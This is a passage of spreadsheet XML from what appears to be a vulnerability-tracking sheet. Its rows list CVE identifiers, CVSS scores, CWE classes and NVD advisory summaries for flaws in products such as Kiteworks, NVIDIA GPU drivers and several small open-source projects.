        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G257" s="5" t="inlineStr"/>
      <c r="H257" s="5" t="inlineStr"/>
      <c r="I257" s="5" t="inlineStr"/>
      <c r="J257" s="5" t="inlineStr">
        <is>
          <t>mysql, php, hp</t>
        </is>
      </c>
      <c r="K257" s="5" t="inlineStr"/>
      <c r="L257" s="5" t="inlineStr"/>
      <c r="M257" s="5" t="inlineStr"/>
      <c r="N257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O257" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P257" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q257" s="5" t="inlineStr"/>
      <c r="R257" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S257" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in AdithyaYelloju Restaurant-Management-System up to 7f0e7e84255e8fcfd488e83f8f91451bbbff6b9c. This issue affects the function mysqli_query of the file admin/delete1.php of the component Unauthenticated Action Script. Performing a manipulation of the argument ID results in sql injection. The attack can be initiated remotely. The exploit has been made public and could be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103229</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103231</t>
        </is>
      </c>
      <c r="D258" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E258" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G258" s="5" t="inlineStr"/>
      <c r="H258" s="5" t="inlineStr"/>
      <c r="I258" s="5" t="inlineStr"/>
      <c r="J258" s="5" t="inlineStr">
        <is>
          <t>mysql, php, hp</t>
        </is>
      </c>
      <c r="K258" s="5" t="inlineStr"/>
      <c r="L258" s="5" t="inlineStr"/>
      <c r="M258" s="5" t="inlineStr"/>
      <c r="N258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O258" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P258" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q258" s="5" t="inlineStr"/>
      <c r="R258" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S258" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in AdithyaYelloju Restaurant-Management-System up to 7f0e7e84255e8fcfd488e83f8f91451bbbff6b9c. The affected element is the function mysqli_query of the file User/cancel.php of the component Order Cancellation. The manipulation of the argument ID leads to sql injection. The attack may be initiated remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103231</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103530</t>
        </is>
      </c>
      <c r="D259" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E259" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G259" s="5" t="inlineStr"/>
      <c r="H259" s="5" t="inlineStr"/>
      <c r="I259" s="5" t="inlineStr"/>
      <c r="J259" s="5" t="inlineStr"/>
      <c r="K259" s="5" t="inlineStr"/>
      <c r="L259" s="5" t="inlineStr"/>
      <c r="M259" s="5" t="inlineStr"/>
      <c r="N259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O259" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P259" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q259" s="5" t="inlineStr"/>
      <c r="R259" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S259" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in decolua 9Router up to 0.5.55. The affected element is the function fetch of the file src/shared/utils/ssrfGuard.js of the component Search Endpoint. Performing a manipulation of the argument provider_options.baseUrl results in server-side request forgery. The attack can be initiated remotely. Applying a patch is the recommended action to fix this issue.</t>
        </is>
      </c>
      <c r="T259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103530</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103536</t>
        </is>
      </c>
      <c r="D260" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E260" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G260" s="5" t="inlineStr"/>
      <c r="H260" s="5" t="inlineStr"/>
      <c r="I260" s="5" t="inlineStr"/>
      <c r="J260" s="5" t="inlineStr"/>
      <c r="K260" s="5" t="inlineStr"/>
      <c r="L260" s="5" t="inlineStr"/>
      <c r="M260" s="5" t="inlineStr"/>
      <c r="N260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O260" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P260" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q260" s="5" t="inlineStr"/>
      <c r="R260" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="S260" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in ZongXR Supermarket 1.0.0.0. Affected by this vulnerability is the function OrderController.addOrder of the file order/src/main/java/com/supermarket/order/controller/OrderController.java of the component save Endpoint. Such manipulation of the argument userId leads to missing authentication. The attack can be executed remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103536</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47496</t>
        </is>
      </c>
      <c r="D261" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E261" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F261" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G261" s="5" t="inlineStr"/>
      <c r="H261" s="5" t="inlineStr"/>
      <c r="I261" s="5" t="inlineStr"/>
      <c r="J261" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K261" s="5" t="inlineStr"/>
      <c r="L261" s="5" t="inlineStr"/>
      <c r="M261" s="5" t="inlineStr"/>
      <c r="N261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O261" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P261" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q261" s="5" t="inlineStr"/>
      <c r="R261" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S261" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the Virtual GPU Manager (vGPU plugin) where a guest VM user may cause an out-of-bounds write by sending a specially crafted RPC call to the host. A successful exploit of this vulnerability might lead to escalation of privileges, data tampering, and denial of service.</t>
        </is>
      </c>
      <c r="T261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47496</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47580</t>
        </is>
      </c>
      <c r="D262" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E262" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F262" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G262" s="5" t="inlineStr"/>
      <c r="H262" s="5" t="inlineStr"/>
      <c r="I262" s="5" t="inlineStr"/>
      <c r="J262" s="5" t="inlineStr"/>
      <c r="K262" s="5" t="inlineStr"/>
      <c r="L262" s="5" t="inlineStr"/>
      <c r="M262" s="5" t="inlineStr"/>
      <c r="N262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O262" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P262" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q262" s="5" t="inlineStr"/>
      <c r="R262" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S262" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel module where an attacker could cause a missing authorization issue. A successful exploit of this vulnerability might lead to information disclosure and data tampering.</t>
        </is>
      </c>
      <c r="T262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47580</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76143</t>
        </is>
      </c>
      <c r="D263" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E263" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F263" s="5" t="inlineStr">
        <is>
          <t>vuln@krcert.or.kr</t>
        </is>
      </c>
      <c r="G263" s="5" t="inlineStr"/>
      <c r="H263" s="5" t="inlineStr"/>
      <c r="I263" s="5" t="inlineStr"/>
      <c r="J263" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K263" s="5" t="inlineStr"/>
      <c r="L263" s="5" t="inlineStr"/>
      <c r="M263" s="5" t="inlineStr"/>
      <c r="N263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O263" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P263" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q263" s="5" t="inlineStr"/>
      <c r="R263" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S263" s="5" t="inlineStr">
        <is>
          <t>A missing authorization vulnerability in Genian SSL PNS allows an attacker to bypass multi-factor authentication by manipulating a login request parameter.</t>
        </is>
      </c>
      <c r="T263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76143</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102089</t>
        </is>
      </c>
      <c r="D264" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E264" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F264" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G264" s="5" t="inlineStr"/>
      <c r="H264" s="5" t="inlineStr"/>
      <c r="I264" s="5" t="inlineStr"/>
      <c r="J264" s="5" t="inlineStr"/>
      <c r="K264" s="5" t="inlineStr"/>
      <c r="L264" s="5" t="inlineStr"/>
      <c r="M264" s="5" t="inlineStr"/>
      <c r="N264" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O264" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P264" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q264" s="5" t="inlineStr"/>
      <c r="R264" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S264" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Email Protection Gateway before version 9.5.0 is vulnerable to a path traversal weakness in an administrative import function allowed an authenticated administrator to write files to arbitrary locations on the server. This could potentially be leveraged to execute arbitrary code on the underlying system.</t>
        </is>
      </c>
      <c r="T264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102089</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102093</t>
        </is>
      </c>
      <c r="D265" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E265" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F265" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G265" s="5" t="inlineStr"/>
      <c r="H265" s="5" t="inlineStr"/>
      <c r="I265" s="5" t="inlineStr"/>
      <c r="J265" s="5" t="inlineStr"/>
      <c r="K265" s="5" t="inlineStr"/>
      <c r="L265" s="5" t="inlineStr"/>
      <c r="M265" s="5" t="inlineStr"/>
      <c r="N265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O265" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P265" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q265" s="5" t="inlineStr"/>
      <c r="R265" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S265" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core before version 9.5.0 is vulnerable to Improper Privilege Management and does not correctly enforce restrictions on role assignment, which could allow an authenticated administrative user with limited, non-Sysadmin role-management permissions to elevate another user to full system-administrator privileges beyond those the administrative user was authorized to grant.</t>
        </is>
      </c>
      <c r="T265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102093</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B266" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102094</t>
        </is>
      </c>
      <c r="D266" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E266" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F266" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G266" s="5" t="inlineStr"/>
      <c r="H266" s="5" t="inlineStr"/>
      <c r="I266" s="5" t="inlineStr"/>
      <c r="J266" s="5" t="inlineStr"/>
      <c r="K266" s="5" t="inlineStr"/>
      <c r="L266" s="5" t="inlineStr"/>
      <c r="M266" s="5" t="inlineStr"/>
      <c r="N266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O266" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P266" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q266" s="5" t="inlineStr"/>
      <c r="R266" s="5" t="inlineStr">
        <is>
          <t>CWE-470</t>
        </is>
      </c>
      <c r="S266" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Email Protection Gateway before version 9.5.0 is vulnerable to Unsafe Reflection and does not sufficiently restrict the code that the mail-processing pipeline could load from an imported rule configuration. An authenticated administrator with mail-rule configuration privileges could cause the gateway to load and execute code beyond the approved set of mail-processing components, potentially in the context of the mail-gateway service account.</t>
        </is>
      </c>
      <c r="T266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102094</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B267" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102096</t>
        </is>
      </c>
      <c r="D267" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E267" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F267" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G267" s="5" t="inlineStr"/>
      <c r="H267" s="5" t="inlineStr"/>
      <c r="I267" s="5" t="inlineStr"/>
      <c r="J267" s="5" t="inlineStr"/>
      <c r="K267" s="5" t="inlineStr"/>
      <c r="L267" s="5" t="inlineStr"/>
      <c r="M267" s="5" t="inlineStr"/>
      <c r="N267" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O267" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P267" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q267" s="5" t="inlineStr"/>
      <c r="R267" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S267" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core before version 9.5.0 is vulnerable to OS Command Injection that allows an authenticated administrator to upload a configuration package whose contents were not sufficiently validated before being processed. A crafted package could cause the underlying system to execute arbitrary operating-system commands, potentially with elevated privileges, on the affected appliance.</t>
        </is>
      </c>
      <c r="T267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102096</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B268" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102097</t>
        </is>
      </c>
      <c r="D268" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E268" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F268" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G268" s="5" t="inlineStr"/>
      <c r="H268" s="5" t="inlineStr"/>
      <c r="I268" s="5" t="inlineStr"/>
      <c r="J268" s="5" t="inlineStr"/>
      <c r="K268" s="5" t="inlineStr"/>
      <c r="L268" s="5" t="inlineStr"/>
      <c r="M268" s="5" t="inlineStr"/>
      <c r="N268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O268" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P268" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q268" s="5" t="inlineStr"/>
      <c r="R268" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-94</t>
        </is>
      </c>
      <c r="S268" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Email Protection Gateway before version 9.5.0 is vulnerable to Remote Code Execution. Kiteworks Email Protection Gateway allowed an authenticated administrator to import configuration whose contents were not sufficiently validated before being processed. A crafted submission could potentially allow arbitrary commands to be executed on the affected gateway.</t>
        </is>
      </c>
      <c r="T268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102097</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B269" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102098</t>
        </is>
      </c>
      <c r="D269" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E269" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F269" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G269" s="5" t="inlineStr"/>
      <c r="H269" s="5" t="inlineStr"/>
      <c r="I269" s="5" t="inlineStr"/>
      <c r="J269" s="5" t="inlineStr"/>
      <c r="K269" s="5" t="inlineStr"/>
      <c r="L269" s="5" t="inlineStr"/>
      <c r="M269" s="5" t="inlineStr"/>
      <c r="N269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O269" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P269" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q269" s="5" t="inlineStr"/>
      <c r="R269" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S269" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core before version 9.5.0 is vulnerable to SQL Injection. A stored SQL injection vulnerability in a Kiteworks administrative reporting feature could allow an authenticated administrator to read sensitive data from the underlying database and to affect the availability of the service. Exploitation requires an existing, authenticated administrative account with access to the affected reporting function.</t>
        </is>
      </c>
      <c r="T269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102098</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B270" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102099</t>
        </is>
      </c>
      <c r="D270" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E270" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F270" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G270" s="5" t="inlineStr"/>
      <c r="H270" s="5" t="inlineStr"/>
      <c r="I270" s="5" t="inlineStr"/>
      <c r="J270" s="5" t="inlineStr"/>
      <c r="K270" s="5" t="inlineStr"/>
      <c r="L270" s="5" t="inlineStr"/>
      <c r="M270" s="5" t="inlineStr"/>
      <c r="N270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O270" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P270" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q270" s="5" t="inlineStr"/>
      <c r="R270" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S270" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core before version 9.5.0 is vulnerable to Arbitrary File Write. An improper restriction of a user-supplied file path in a Kiteworks administrative export feature could allow an authenticated administrator to write a file to an arbitrary location on the underlying host, potentially leading to command execution on the appliance. Exploitation requires an existing, authenticated administrative account with access to the affected export function.</t>
        </is>
      </c>
      <c r="T270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102099</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B271" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102108</t>
        </is>
      </c>
      <c r="D271" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E271" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F271" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G271" s="5" t="inlineStr"/>
      <c r="H271" s="5" t="inlineStr"/>
      <c r="I271" s="5" t="inlineStr"/>
      <c r="J271" s="5" t="inlineStr"/>
      <c r="K271" s="5" t="inlineStr"/>
      <c r="L271" s="5" t="inlineStr"/>
      <c r="M271" s="5" t="inlineStr"/>
      <c r="N271" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O271" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P271" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q271" s="5" t="inlineStr"/>
      <c r="R271" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S271" s="5" t="inlineStr">
        <is>
          <t>An authenticated administrator of Kiteworks Email Protection Gateway could submit a crafted serialized object to a cluster management interface that was deserialized without sufficient validation, potentially allowing arbitrary code execution in the context of the gateway service account. Exploitation requires an administrator account holding a specific queue-management privilege.</t>
        </is>
      </c>
      <c r="T271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102108</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B272" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102114</t>
        </is>
      </c>
      <c r="D272" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E272" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F272" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G272" s="5" t="inlineStr"/>
      <c r="H272" s="5" t="inlineStr"/>
      <c r="I272" s="5" t="inlineStr"/>
      <c r="J272" s="5" t="inlineStr"/>
      <c r="K272" s="5" t="inlineStr"/>
      <c r="L272" s="5" t="inlineStr"/>
      <c r="M272" s="5" t="inlineStr"/>
      <c r="N272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O272" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P272" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q272" s="5" t="inlineStr"/>
      <c r="R272" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S272" s="5" t="inlineStr">
        <is>
          <t>A command injection vulnerability in Kiteworks could allow a high-privileged authenticated administrator to execute arbitrary operating-system commands as root on the affected appliance node. Successful exploitation requires an administrative account with elevated privileges.</t>
        </is>
      </c>
      <c r="T272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102114</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B273" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102116</t>
        </is>
      </c>
      <c r="D273" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E273" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F273" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G273" s="5" t="inlineStr"/>
      <c r="H273" s="5" t="inlineStr"/>
      <c r="I273" s="5" t="inlineStr"/>
